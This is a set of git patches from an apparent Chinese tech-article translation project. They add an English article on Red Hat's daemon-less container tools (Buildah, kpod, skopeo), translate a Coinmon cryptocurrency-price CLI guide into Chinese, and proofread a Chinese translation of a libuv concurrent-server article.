From df3691aab2653a9401d245e4002390236b0270ca Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 23:16:58 +0800
Subject: [PATCH 151/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Containers=20with?=
=?UTF-8?q?out=20Docker=20at=20Red=20Hat?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...20 Containers without Docker at Red Hat.md | 115 ++++++++++++++++++
1 file changed, 115 insertions(+)
create mode 100644 sources/tech/20171220 Containers without Docker at Red Hat.md
diff --git a/sources/tech/20171220 Containers without Docker at Red Hat.md b/sources/tech/20171220 Containers without Docker at Red Hat.md
new file mode 100644
index 0000000000..e5fc2db4f9
--- /dev/null
+++ b/sources/tech/20171220 Containers without Docker at Red Hat.md
@@ -0,0 +1,115 @@
+Containers without Docker at Red Hat
+======
+
+The Docker (now [Moby][1]) project has done a lot to popularize containers in recent years. Along the way, though, it has generated concerns about its concentration of functionality into a single, monolithic system under the control of a single daemon running with root privileges: `dockerd`. Those concerns were reflected in a [talk][2] by Dan Walsh, head of the container team at Red Hat, at [KubeCon + CloudNativeCon][3]. Walsh spoke about the work the container team is doing to replace Docker with a set of smaller, interoperable components. His rallying cry is "no big fat daemons" as he finds them to be contrary to the venerated Unix philosophy.
+
+### The quest to modularize Docker
+
+As we saw in an [earlier article][4], the basic set of container operations is not that complicated: you need to pull a container image, create a container from the image, and start it. On top of that, you need to be able to build images and push them to a registry. Most people still use Docker for all of those steps but, as it turns out, Docker isn't the only name in town anymore: an early alternative was `rkt`, which led to the creation of various standards like CRI (runtime), OCI (image), and CNI (networking) that allow backends like [CRI-O][5] or Docker to interoperate with, for example, [Kubernetes][6].
+
+These standards led Red Hat to create a set of "core utils" like the CRI-O runtime that implements the parts of the standards that Kubernetes needs. But Red Hat's [OpenShift][7] project needs more than what Kubernetes provides. Developers will want to be able to build containers and push them to the registry. Those operations need a whole different bag of tricks.
+
+It turns out that there are multiple tools to build containers right now. Apart from Docker itself, a [session][8] from Michael Ducy of Sysdig reviewed eight image builders, and that's probably not all of them. Ducy identified the ideal build tool as one that would create a minimal image in a reproducible way. A minimal image is one where there is no operating system, only the application and its essential dependencies. Ducy identified [Distroless][9], [Smith][10], and [Source-to-Image][11] as good tools to build minimal images, which he called "micro-containers".
+
+A reproducible container is one that you can build multiple times and always get the same result. For that, Ducy said you have to use a "declarative" approach (as opposed to "imperative"), which is understandable given that he comes from the Chef configuration-management world. He gave the examples of [Ansible Container][12], [Habitat][13], [nixos-container][14], and Smith (yes, again) as being good approaches, provided you were familiar with their domain-specific languages. He added that Habitat ships its own supervisor in its containers, which may be superfluous if you already have an external one, like systemd, Docker, or Kubernetes. To complete the list, we should mention the new [BuildKit][15] from Docker and [Buildah][16], which is part of Red Hat's [Project Atomic][17].
+
+### Building containers with Buildah
+
+![\[Buildah logo\]][18] Buildah's name apparently comes from Walsh's colorful [Boston accent][19]; the Boston theme permeates the branding of the tool: the logo, for example, is a Boston terrier dog (seen at right). This project takes a different approach from Ducy's decree: instead of enforcing a declarative configuration-management approach to containers, why not build simple tools that can be used by your favorite configuration-management tool? If you want to use regular command-line commands like `cp` (instead of Docker's custom `COPY` directive, for example), you can. But you can also use Ansible or Puppet, OS-specific or language-specific installers like APT or pip, or whatever other system to provision the content of your containers. This is what building a container looks like with regular shell commands and simply using `make` to install a binary inside the container:
+```
+ # pull a base image, equivalent to a Dockerfile's FROM command
+ ctr=$(buildah from redhat)
+
+ # mount the working container's filesystem to work on it
+ mnt=$(buildah mount $ctr)
+ cp foo $mnt
+ make install DESTDIR=$mnt
+
+ # then make a snapshot of the working container as an image
+ buildah commit $ctr
+
+```
+
+An interesting thing with this approach is that, since you reuse normal build tools from the host environment, you can build really minimal images because you don't need to install all the dependencies in the image. Usually, when building a container image, the target application build dependencies need to be installed within the container. For example, building from source usually requires a compiler toolchain in the container, because it is not meant to access the host environment. A lot of containers will also ship basic Unix tools like `ps` or `bash` which are not actually necessary in a micro-container. Developers often forget to (or simply can't) remove some dependencies from the built containers; that common practice creates unnecessary overhead and attack surface.
+
+The modular approach of Buildah means you can run at least parts of the build as non-root: the `mount` command still needs the `CAP_SYS_ADMIN` capability, but there is an [issue][20] open to resolve this. However, Buildah [shares][21] the same [limitation][22] as Docker in that it can't build containers inside containers. For Docker, you need to run the container in "privileged" mode, which is not possible in certain environments (like [GitLab Continuous Integration][23], for example) and, even when it is possible, the configuration is [messy][24] at best.
+
+The manual commit step allows fine-grained control over when to create container snapshots. While in a Dockerfile every line creates a new snapshot, with Buildah commit checkpoints are explicitly chosen, which reduces unnecessary snapshots and saves disk space. This is useful to isolate sensitive material like private keys or passwords which sometimes mistakenly end up in public images as well.
+
+While Docker builds non-standard, Docker-specific images, Buildah produces standard OCI images among [other output formats][25]. For backward compatibility, it has a command called `build-using-dockerfile` or [`buildah bud`][26] that parses normal Dockerfiles. Buildah has an `enter` command to inspect images from the inside directly and a `run` command to start containers on the fly. It does all the work without any "fat daemon" running in the background and uses standard tools like `runc`.
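+
+As a rough sketch, that Dockerfile-compatible path and the `run` command might be used like this (the image name is made up for illustration):
+```
+ # build an OCI image from an existing Dockerfile in the current directory
+ buildah bud -t myapp .
+
+ # create a working container from that image and run a command inside it
+ ctr=$(buildah from myapp)
+ buildah run $ctr -- ls /
+```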
+
+Ducy's criticism of Buildah was that it was not declarative, which made it less reproducible. When allowing shell commands anything can happen: for example, a shell script might download arbitrary binaries, without any way of subsequently retracing where those come from. Shell command effects may vary according to the environment. In contrast to shell-based tools, configuration-management systems like Puppet or Chef are designed to "converge" over a final configuration that is more reliable, at least in theory: in practice you can call shell commands from configuration-management systems. Walsh, however, argued that existing configuration management can be used on top of Buildah, but it doesn't force users down that path. This fits well with the classic "separation" principle of the Unix philosophy ("mechanism not policy").
+
+At this point, Buildah is in beta and Red Hat is working on integrating it into OpenShift. I have tested Buildah while writing this article and, short of some documentation issues, it generally works reliably. It could use some polishing in error handling, but it is definitely a great asset to add to your container toolbox.
+
+### Replacing the rest of the Docker command-line
+
+Walsh continued his presentation by giving an overview of another project that Red Hat is working on, tentatively called [libpod][27]. The name derives from a "pod" in Kubernetes, which is a way to group containers inside a host, to share namespaces, for example.
+
+Libpod includes the `kpod` command to inspect and manipulate container storage directly. Walsh explained this can be useful if, for example, `dockerd` hangs or if a Kubernetes cluster crashes. `kpod` is basically an independent re-implementation of the `docker` command-line tool. There is a command to list running containers (`kpod ps`) or images (`kpod images`). In fact, there is a [translation cheat sheet][28] documenting all Docker commands with a `kpod` equivalent.
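+
+As a sketch, the day-to-day usage maps almost one-to-one onto the `docker` command line (exact sub-command names and flags as per the cheat sheet above):
+```
+ kpod images                 # list local images, like `docker images`
+ kpod ps -a                  # list containers, like `docker ps -a`
+ kpod pull alpine            # fetch an image from a registry
+ kpod run alpine echo hello  # start a container as a child of the current shell
+```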
+
+One of the nice things with the modular approach is that when you run a container with `kpod run`, the container is directly started as a subprocess of the current shell, instead of a subprocess of `dockerd`. In theory, this allows running containers directly from systemd, removing the duplicate work `dockerd` is doing. It enables things like [socket-activated containers][29], which is something that is [not straightforward][30] to do with Docker, or [even with Kubernetes][31] right now. In my experiments, however, I have found that containers started with `kpod` lack some fundamental functionality, namely networking (!), although there is an [issue in progress][32] to complete that implementation.
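+
+To make that idea concrete, a container could in principle be managed as an ordinary service unit; the following is a purely hypothetical sketch (the unit path, the image name `myapp`, and the assumption that `kpod` provides everything a long-running service needs are all illustrative):
+```
+ # /etc/systemd/system/myapp-container.service (hypothetical)
+ [Unit]
+ Description=Example application container started directly by systemd
+
+ [Service]
+ ExecStart=/usr/bin/kpod run myapp
+ Restart=on-failure
+
+ [Install]
+ WantedBy=multi-user.target
+```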
+
+A final command we haven't covered is `push`. While the above commands provide a good process for working with local containers, they don't cover remote registries, which allow developers to actively collaborate on application packaging. Registries are also an essential part of a continuous-deployment framework. This is where the [skopeo][33] project comes in. Skopeo is another Atomic project that "performs various operations on container images and image repositories", according to the `README` file. It was originally designed to inspect the contents of container registries without actually downloading the sometimes voluminous images as `docker pull` does. Docker [refused patches][34] to support inspection, suggesting the creation of a separate tool, which led to Skopeo. After `pull`, `push` was the logical next step and Skopeo can now do a bunch of other things like copying and converting images between registries without having to store a copy locally. Because this functionality was useful to other projects as well, a lot of the Skopeo code now lives in a reusable library called [containers/image][35]. That library is in turn used by [Pivotal][36], Google's [container-diff][37], `kpod push`, and `buildah push`.
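+
+As a sketch, inspecting and copying images without a local daemon looks roughly like this (the destination registry is a placeholder):
+```
+ # read an image's metadata straight from the registry, without pulling its layers
+ skopeo inspect docker://docker.io/library/alpine:latest
+
+ # copy an image from one registry to another without storing it locally
+ skopeo copy docker://docker.io/library/alpine:latest docker://registry.example.com/myproject/alpine:latest
+```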
+
+`kpod` is not directly tied to Kubernetes, so the name might change in the future -- especially since Red Hat legal has not cleared the name yet. (In fact, just as this article was going to "press", the name was changed to [`podman`][38].) The team wants to implement more "pod-level" commands which would allow operations on multiple containers, a bit like what [`docker compose`][39] might do. But at that level, a better tool might be [Kompose][40] which can execute [Compose YAML files][41] into a Kubernetes cluster. Some Docker commands (like [`swarm`][42]) will never be implemented, on purpose, as they are best left for Kubernetes itself to handle.
+
+It seems that the effort to modularize Docker that started a few years ago is finally bearing fruit. While, at this point, `kpod` is under heavy development and probably should not be used in production, the design of those different tools is certainly interesting; a lot of it is ready for development environments. Right now, the only way to install libpod is to compile it from source, but we should expect packages coming out for your favorite distribution eventually.
+
+> This article [first appeared][43] in the [Linux Weekly News][44].
+
+--------------------------------------------------------------------------------
+
+via: https://anarc.at/blog/2017-12-20-docker-without-docker/
+
+作者:[À propos de moi][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://anarc.at
+[1]:https://mobyproject.org/
+[2]:https://kccncna17.sched.com/event/CU8j/cri-o-hosted-by-daniel-walsh-red-hat
+[3]:http://events.linuxfoundation.org/events/kubecon-and-cloudnativecon-north-america
+[4]:https://lwn.net/Articles/741897/
+[5]:http://cri-o.io/
+[6]:https://kubernetes.io/
+[7]:https://www.openshift.com/
+[8]:https://kccncna17.sched.com/event/CU6B/building-better-containers-a-survey-of-container-build-tools-i-michael-ducy-chef
+[9]:https://github.com/GoogleCloudPlatform/distroless
+[10]:https://github.com/oracle/smith
+[11]:https://github.com/openshift/source-to-image
+[12]:https://www.ansible.com/ansible-container
+[13]:https://www.habitat.sh/
+[14]:https://nixos.org/nixos/manual/#ch-containers
+[15]:https://github.com/moby/buildkit
+[16]:https://github.com/projectatomic/buildah
+[17]:https://www.projectatomic.io/
+[18]:https://raw.githubusercontent.com/projectatomic/buildah/master/logos/buildah-logomark_large.png (Buildah logo)
+[19]:https://en.wikipedia.org/wiki/Boston_accent
+[20]:https://github.com/projectatomic/buildah/issues/171
+[21]:https://github.com/projectatomic/buildah/issues/158
+[22]:https://github.com/moby/moby/issues/27886#issuecomment-281278525
+[23]:https://about.gitlab.com/features/gitlab-ci-cd/
+[24]:https://jpetazzo.github.io/2015/09/03/do-not-use-docker-in-docker-for-ci/
+[25]:https://github.com/projectatomic/buildah/blob/master/docs/buildah-push.md
+[26]:https://github.com/projectatomic/buildah/blob/master/docs/buildah-bud.md
+[27]:https://github.com/projectatomic/libpod
+[28]:https://github.com/projectatomic/libpod/blob/master/transfer.md#development-transfer
+[29]:http://0pointer.de/blog/projects/socket-activated-containers.html
+[30]:https://legacy-developer.atlassian.com/blog/2015/03/docker-systemd-socket-activation/
+[31]:https://github.com/kubernetes/kubernetes/issues/484
+[32]:https://github.com/projectatomic/libpod/issues/129
+[33]:https://github.com/projectatomic/skopeo
+[34]:https://github.com/moby/moby/pull/14258
+[35]:https://github.com/containers/image
+[36]:https://pivotal.io/
+[37]:https://github.com/GoogleCloudPlatform/container-diff
+[38]:https://github.com/projectatomic/libpod/blob/master/docs/podman.1.md
+[39]:https://docs.docker.com/compose/overview/#compose-documentation
+[40]:http://kompose.io/
+[41]:https://docs.docker.com/compose/compose-file/
+[42]:https://docs.docker.com/engine/swarm/
+[43]:https://lwn.net/Articles/741841/
+[44]:http://lwn.net/
From de3feeea6d61e766f85c78c14e214441129005ed Mon Sep 17 00:00:00 2001
From: geekpi
Date: Mon, 8 Jan 2018 09:17:21 +0800
Subject: [PATCH 152/371] translated
---
... Cryptocurrency Prices From Commandline.md | 89 -------------------
... Cryptocurrency Prices From Commandline.md | 88 ++++++++++++++++++
2 files changed, 88 insertions(+), 89 deletions(-)
delete mode 100644 sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md
create mode 100644 translated/tech/20171123 Check Cryptocurrency Prices From Commandline.md
diff --git a/sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md b/sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md
deleted file mode 100644
index 4a7e85ce0c..0000000000
--- a/sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md
+++ /dev/null
@@ -1,89 +0,0 @@
-translating---geekpi
-
-Check Cryptocurrency Prices From Commandline
-======
-![配图](https://www.ostechnix.com/wp-content/uploads/2017/11/bitcoin-1-720x340.jpg)
-A while ago, we published a guide about **[Cli-Fyi][1] ** - a potentially useful command line query tool. Using Cli-Fyi, we can easily find out the latest price of a cryptocurrency and lots of other useful details. Today, we are going to see yet another cryptcurrency price checker tool called **" Coinmon"**. Unlike Cli.Fyi, Coinmon is only for checking the price of various cryptocurrencies. Nothing more! Coinmon will check cryptocurrencies' prices, changes right from your Terminal. It will fetch all details from from [coinmarketcap.com][2] APIs. It is quite useful for those who are both **Crypto investors** and **Engineers**.
-
-### Installing Coinmon
-
-Make sure you have Node.js and Npm installed on your system. If you don't have Node.js and/or npm installed on your machine, refer the following link to install them.
-
-Once Node.js and Npm installed, run the following command from your Terminal to install Coinmon.
-```
-sudo npm install -g coinmon
-```
-
-### Check Cryptocurrency Prices From Commandline
-
-Run the following command to check the top 10 cryptocurrencies ranked by their market cap:
-```
-coinmon
-```
-
-Sample output would be:
-
-[![][3]][4]
-
-Like I said, if you run the coinmon without any parameters, it will display the top 10 cryptocurrencies. You can also find top top n cryptocurrencies, for example 20, by using "-t" flag.
-```
-coinmon -t 20
-```
-
-All prices will be displayed in USD by default. You can also convert price from USD to another currency by using "-c" flag.
-
-For instance, to convert the prices to INR (Indian Rupee), run:
-```
-coinmon -c inr
-```
-
-[![][3]][5]
-
-Currently, Coinmon supports AUD, BRL, CAD, CHF, CLP, CNY, CZK, DKK, EUR, GBP, HKD, HUF, IDR, ILS, INR, JPY, KRW, MXN, MYR, NOK, NZD, PHP, PKR, PLN, RUB, SEK, SGD, THB, TRY, TWD, ZAR currencies.
-
-It is also possible to search the prices using the symbol of a cryptocurrency.
-```
-coinmon -f btc
-```
-
-Here, **btc** is the symbol of Bitcoin cryptocurrency. You can view the symbols of all available cryptocurrencies [**here**][6].
-
-For more details, refer coinmon's help section:
-```
-$ coinmon -h
-
-Usage: coinmon [options]
-
-Options:
-
- -V, --version output the version number
- -c, --convert [currency] Convert to your fiat currency (default: usd)
- -f, --find [symbol] Find specific coin data with coin symbol (can be a comma seperated list) (default: )
- -t, --top [index] Show the top coins ranked from 1 - [index] according to the market cap (default: null)
- -H, --humanize [enable] Show market cap as a humanized number, default true (default: true)
- -h, --help output usage information
-```
-
-Hope this helps. More good stuffs to come. Stay tuned!
-
-Cheers!
-
-
-
---------------------------------------------------------------------------------
-
-via: https://www.ostechnix.com/coinmon-check-cryptocurrency-prices-commandline/
-
-作者:[SK][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.ostechnix.com/author/sk/
-[1]:https://www.ostechnix.com/cli-fyi-quick-easy-way-fetch-information-ips-emails-domains-lots/
-[2]:https://coinmarketcap.com/
-[3]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
-[4]:http://www.ostechnix.com/wp-content/uploads/2017/11/coinmon-1.png ()
-[5]:http://www.ostechnix.com/wp-content/uploads/2017/11/coinmon-2.png ()
-[6]:https://en.wikipedia.org/wiki/List_of_cryptocurrencies
diff --git a/translated/tech/20171123 Check Cryptocurrency Prices From Commandline.md b/translated/tech/20171123 Check Cryptocurrency Prices From Commandline.md
new file mode 100644
index 0000000000..ba4a7bdefe
--- /dev/null
+++ b/translated/tech/20171123 Check Cryptocurrency Prices From Commandline.md
@@ -0,0 +1,88 @@
+从命令行查看加密货币价格
+======
+![配图](https://www.ostechnix.com/wp-content/uploads/2017/11/bitcoin-1-720x340.jpg)
+前段时间,我们发布了一个关于 **[Cli-Fyi][1]** 的指南,它是一个可能很有用的命令行查询工具。使用 Cli-Fyi,我们可以很容易地了解加密货币的最新价格和许多其他有用的细节。今天,我们将看到另一个名为 **“Coinmon”** 的加密货币价格查看工具。与 Cli.Fyi 不同,Coinmon 只能用来查看不同加密货币的价格,没有其他功能!Coinmon 可以直接在你的终端里查看各种加密货币的价格及其涨跌变化。它从 [coinmarketcap.com][2] 的 API 获取所有详细信息。对于**加密货币投资者**和**工程师**来说,它是非常有用的。
+
+### 安装 Coinmon
+
+确保你的系统上安装了 Node.js 和 Npm。如果你的机器上没有安装 Node.js 和/或 npm,请参考以下链接进行安装。
+
+安装完 Node.js 和 Npm 后,从终端运行以下命令安装 Coinmon。
+```
+sudo npm install -g coinmon
+```
+
+### 从命令行查看加密货币价格
+
+运行以下命令查看市值排名的前 10 位的加密货币:
+```
+coinmon
+```
+
+示例输出:
+
+[![][3]][4]
+
+如我所说,如果你不带任何参数运行 coinmon,它将显示前 10 位加密货币。你还可以使用 “-t” 标志查看最高的 n 位加密货币,例如 20。
+```
+coinmon -t 20
+```
+
+所有价格默认以美元显示。你还可以使用 “-c” 标志将价格从美元转换为另一种货币。
+
+例如,要将价格转换为 INR(印度卢比),运行:
+```
+coinmon -c inr
+```
+
+[![][3]][5]
+
+目前,Coinmon 支持 AUD、BRL、CAD、CHF、CLP、CNY、CZK、DKK、EUR、GBP、HKD、HUF、IDR、ILS、INR、JPY、KRW、MXN、MYR、NOK、NZD、PHP、PKR、PLN、RUB、SEK、SGD、THB、TRY、TWD、ZAR 这些货币。
+
+也可以使用加密货币的符号来搜索价格。
+```
+coinmon -f btc
+```
+
+这里,**btc** 是比特币的符号。你可以在[**这**][6]查看所有可用的加密货币的符号。
+
+有关更多详情,请参阅coinmon的帮助部分:
+
+```
+$ coinmon -h
+
+Usage: coinmon [options]
+
+Options:
+
+ -V, --version output the version number
+ -c, --convert [currency] Convert to your fiat currency (default: usd)
+ -f, --find [symbol] Find specific coin data with coin symbol (can be a comma seperated list) (default: )
+ -t, --top [index] Show the top coins ranked from 1 - [index] according to the market cap (default: null)
+ -H, --humanize [enable] Show market cap as a humanized number, default true (default: true)
+ -h, --help output usage information
+```
+
+希望这个对你有帮助。还会有更多好东西,敬请关注!
+
+干杯!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/coinmon-check-cryptocurrency-prices-commandline/
+
+作者:[SK][a]
+译者:[geekpi](https://github.com/geekpi)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://www.ostechnix.com/cli-fyi-quick-easy-way-fetch-information-ips-emails-domains-lots/
+[2]:https://coinmarketcap.com/
+[3]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[4]:http://www.ostechnix.com/wp-content/uploads/2017/11/coinmon-1.png ()
+[5]:http://www.ostechnix.com/wp-content/uploads/2017/11/coinmon-2.png ()
+[6]:https://en.wikipedia.org/wiki/List_of_cryptocurrencies
From a20a283877253e672cef76cc12a993a33224fd01 Mon Sep 17 00:00:00 2001
From: geekpi
Date: Mon, 8 Jan 2018 09:19:35 +0800
Subject: [PATCH 153/371] translated
---
.../20171016 Fixing vim in Debian - There and back again.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20171016 Fixing vim in Debian - There and back again.md b/sources/tech/20171016 Fixing vim in Debian - There and back again.md
index 0b67edcf63..622b9fe885 100644
--- a/sources/tech/20171016 Fixing vim in Debian - There and back again.md
+++ b/sources/tech/20171016 Fixing vim in Debian - There and back again.md
@@ -1,3 +1,5 @@
+translating---geekpi
+
Fixing vim in Debian – There and back again
======
I was wondering for quite some time why on my server vim behaves so stupid with respect to the mouse: Jumping around, copy and paste wasn't possible the usual way. All this despite having
From e4bc03b48bb884b9487ff597c67fdcd2f556b897 Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 09:59:47 +0800
Subject: [PATCH 154/371] PRF:20171109 Concurrent Servers- Part 4 - libuv.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
部分校对
---
...1109 Concurrent Servers- Part 4 - libuv.md | 52 +++++++++----------
1 file changed, 24 insertions(+), 28 deletions(-)
diff --git a/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md b/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md
index 07994c67b1..e819027b7d 100644
--- a/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md
+++ b/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md
@@ -1,31 +1,28 @@
-[并发服务器:第四部分 - libuv][17]
+并发服务器(四):libuv
============================================================
-这是写并发网络服务器系列文章的第四部分。在这一部分中,我们将使用 libuv 去再次重写我们的服务器,并且也讨论关于使用一个线程池在回调中去处理耗时任务。最终,我们去看一下底层的 libuv,花一点时间去学习如何用异步 API 对文件系统阻塞操作进行封装。
+这是并发网络服务器系列文章的第四部分。在这一部分中,我们将使用 libuv 再次重写我们的服务器,并且也会讨论关于使用一个线程池在回调中去处理耗时任务。最终,我们去看一下底层的 libuv,花一点时间去学习如何用异步 API 对文件系统阻塞操作进行封装。
-这一系列的所有文章包括:
+本系列的所有文章:
-* [第一部分 - 简介][7]
+* [第一节 - 简介][7]
+* [第二节 - 线程][8]
+* [第三节 - 事件驱动][9]
+* [第四节 - libuv][10]
-* [第二部分 - 线程][8]
+### 使用 libuv 抽象出事件驱动循环
-* [第三部分 - 事件驱动][9]
+在 [第三节][11] 中,我们看到了基于 `select` 和 `epoll` 的服务器的相似之处,并且,我说过,在它们之间抽象出细微的差别是件很有吸引力的事。许多库已经做到了这些,所以在这一部分中我将去选一个并使用它。我选的这个库是 [libuv][12],它最初设计用于 Node.js 底层的可移植平台层,并且,后来发现在其它的项目中已有使用。libuv 是用 C 写的,因此,它具有很高的可移植性,非常适用嵌入到像 JavaScript 和 Python 这样的高级语言中。
-* [第四部分 - libuv][10]
-
-### 使用 Linux 抽象出事件驱动循环
-
-在 [第三部分][11] 中,我们看到了基于 `select` 和 `epoll` 的相似之处,并且,我说过,在它们之间抽象出细微的差别是件很有魅力的事。Numerous 库已经做到了这些,但是,因为在这一部分中,我将去选一个并使用它。我选的这个库是 [libuv][12],它最初设计用于 Node.js 底层的轻便的平台层,并且,后来发现在其它的项目中已有使用。libuv 是用 C 写的,因此,它具有很高的可移植性,非常适用嵌入到像 JavaScript 和 Python 这样的高级语言中。
-
-虽然 libuv 为抽象出底层平台细节已经有了一个非常大的框架,但它仍然是一个以 _事件循环_ 思想为中心的。在我们第三部分的事件驱动服务器中,事件循环在 main 函数中是很明确的;当使用 libuv 时,循环通常隐藏在库自身中,而用户代码仅需要注册事件句柄(作为一个回调函数)和运行这个循环。此外,libuv 将为给定的平台实现更快的事件循环实现。对于 Linux 它是 epoll,等等。
+虽然 libuv 为抽象出底层平台细节已经变成了一个相当大的框架,但它仍然是以 _事件循环_ 思想为中心的。在我们第三部分的事件驱动服务器中,事件循环在 `main` 函数中是很明确的;当使用 libuv 时,该循环通常隐藏在库自身中,而用户代码仅需要注册事件句柄(作为一个回调函数)和运行这个循环。此外,libuv 会在给定的平台上使用更快的事件循环实现,对于 Linux 它是 epoll,等等。
![libuv loop](https://eli.thegreenplace.net/images/2017/libuvloop.png)
-libuv 支持多路事件循环,并且,因此一个事件循环在库中是非常重要的;它有一个句柄 - `uv_loop_t`,和创建/杀死/启动/停止循环的函数。也就是说,在这篇文章中,我将仅需要使用 “默认的” 循环,libuv 可通过 `uv_default_loop()` 提供它;多路循环大多用于多线程事件驱动的服务器,这是一个更高级别的话题,我将留在这一系列文章的以后部分。
+libuv 支持多路事件循环,并且,因此事件循环在库中是非常重要的;它有一个句柄 —— `uv_loop_t`,和创建/杀死/启动/停止循环的函数。也就是说,在这篇文章中,我将仅需要使用 “默认的” 循环,libuv 可通过 `uv_default_loop()` 提供它;多路循环大多用于多线程事件驱动的服务器,这是一个更高级别的话题,我将留在这一系列文章的以后部分。
### 使用 libuv 的并发服务器
-为了对 libuv 有一个更深的印象,让我们跳转到我们的可靠的协议服务器,它通过我们的这个系列已经有了一个强大的重新实现。这个服务器的结构与第三部分中的基于 select 和 epoll 的服务器有一些相似之处。因为,它也依赖回调。完整的 [示例代码在这里][13];我们开始设置这个服务器的套接字绑定到一个本地端口:
+为了对 libuv 有一个更深的印象,让我们跳转到我们的可靠协议的服务器,它通过我们的这个系列已经有了一个强大的重新实现。这个服务器的结构与第三部分中的基于 select 和 epoll 的服务器有一些相似之处,因为,它也依赖回调。完整的 [示例代码在这里][13];我们开始设置这个服务器的套接字绑定到一个本地端口:
```
int portnum = 9090;
@@ -50,11 +47,11 @@ if ((rc = uv_tcp_bind(&server_stream, (const struct sockaddr*)&server_address, 0
}
```
-除了它被封装进 libuv APIs 中之外,你看到的是一个相当标准的套接字。在它的返回中,我们取得一个可工作于任何 libuv 支持的平台上的轻便的接口。
+除了它被封装进 libuv API 中之外,你看到的是一个相当标准的套接字。在它的返回中,我们取得一个可工作于任何 libuv 支持的平台上的可移植接口。
-这些代码也很认真负责地演示了错误处理;多数的 libuv 函数返回一个整数状态,返回一个负数意味着出现了一个错误。在我们的服务器中,我们把这些错误按致命的问题处理,但也可以设想为一个更优雅的恢复。
+这些代码也展示了很认真负责的错误处理;多数的 libuv 函数返回一个整数状态,返回一个负数意味着出现了一个错误。在我们的服务器中,我们把这些错误看做致命问题进行处理,但也可以设想为一个更优雅的错误恢复。
-现在,那个套接字已经绑定,是时候去监听它了。这里我们运行一个回调注册:
+现在,那个套接字已经绑定,是时候去监听它了。这里我们运行首个回调注册:
```
// Listen on the socket for new peers to connect. When a new peer connects,
@@ -64,9 +61,9 @@ if ((rc = uv_listen((uv_stream_t*)&server_stream, N_BACKLOG, on_peer_connected))
}
```
-当新的对端连接到这个套接字,`uv_listen` 将被调用去注册一个事件循环回调。我们的回调在这里被称为 `on_peer_connected`,并且我们一会儿将去检测它。
+`uv_listen` 注册一个事件回调,当新的对端连接到这个套接字时将会调用事件循环。我们的回调在这里被称为 `on_peer_connected`,我们一会儿将去查看它。
-最终,main 运行这个 libuv 循环,直到它被停止(`uv_run` 仅在循环被停止或者发生错误时返回)
+最终,`main` 运行这个 libuv 循环,直到它被停止(`uv_run` 仅在循环被停止或者发生错误时返回)。
```
// Run the libuv event loop.
@@ -76,7 +73,7 @@ uv_run(uv_default_loop(), UV_RUN_DEFAULT);
return uv_loop_close(uv_default_loop());
```
-注意,那个仅是一个单一的通过 main 优先去运行的事件循环回调;我们不久将看到怎么去添加更多的另外的回调。在事件循环的整个运行时中,添加和删除回调并不是一个问题 - 事实上,大多数服务器就是这么写的。
+注意,在运行事件循环之前,只有一个回调是通过 main 注册的;我们稍后将看到怎么去添加更多的回调。在事件循环的整个运行过程中,添加和删除回调并不是一个问题 —— 事实上,大多数服务器就是这么写的。
这是一个 `on_peer_connected`,它处理到服务器的新的客户端连接:
@@ -135,9 +132,8 @@ void on_peer_connected(uv_stream_t* server_stream, int status) {
这些代码都有很好的注释,但是,这里有一些重要的 libuv 语法我想去强调一下:
-* 进入回调中的自定义数据:因为 C 还没有停用,这可能是个挑战,libuv 在它的处理类型中有一个 `void*` 数据域;这些域可以被用于进入到用户数据。例如,注意 `client->data` 是如何指向到一个 `peer_state_t` 结构上,以便于通过 `uv_write` 和 `uv_read_start` 注册的回调可以知道它们正在处理的是哪个客户端的数据。
-
-* 内存管理:事件驱动编程在语言中使用垃圾回收是非常容易的,因为,回调通常运行在一个它们注册的完全不同的栈框架中,使得基于栈的内存管理很困难。它总是需要传递堆分配的数据到 libuv 回调中(当所有回调运行时,除了 main,其它的都运行在栈上),并且,为了避免泄漏,许多情况下都要求这些数据去安全释放。这些都是些需要实践的内容 [[1]][6]。
+* 传入自定义数据到回调中:因为 C 还没有闭包,这可能是个挑战,libuv 在它的所有的处理类型中有一个 `void* data` 字段;这些字段可以被用于传递用户数据。例如,注意 `client->data` 是如何指向到一个 `peer_state_t` 结构上,以便于 `uv_write` 和 `uv_read_start` 注册的回调可以知道它们正在处理的是哪个客户端的数据。
+* 内存管理:在带有垃圾回收的语言中进行事件驱动编程要容易得多,因为回调通常运行在一个与它们被注册时完全不同的栈帧中,这使得基于栈的内存管理很困难。所以几乎总是需要把堆上分配的数据传递给 libuv 回调(唯一的例外是 `main`,当所有回调运行时,它仍然存活在栈上),并且,为了避免泄漏,许多情况下都需要知道什么时候可以安全地释放这些数据。这些都是需要一些实践才能掌握的内容 [[1]][6],下面给出一个简短的示意。
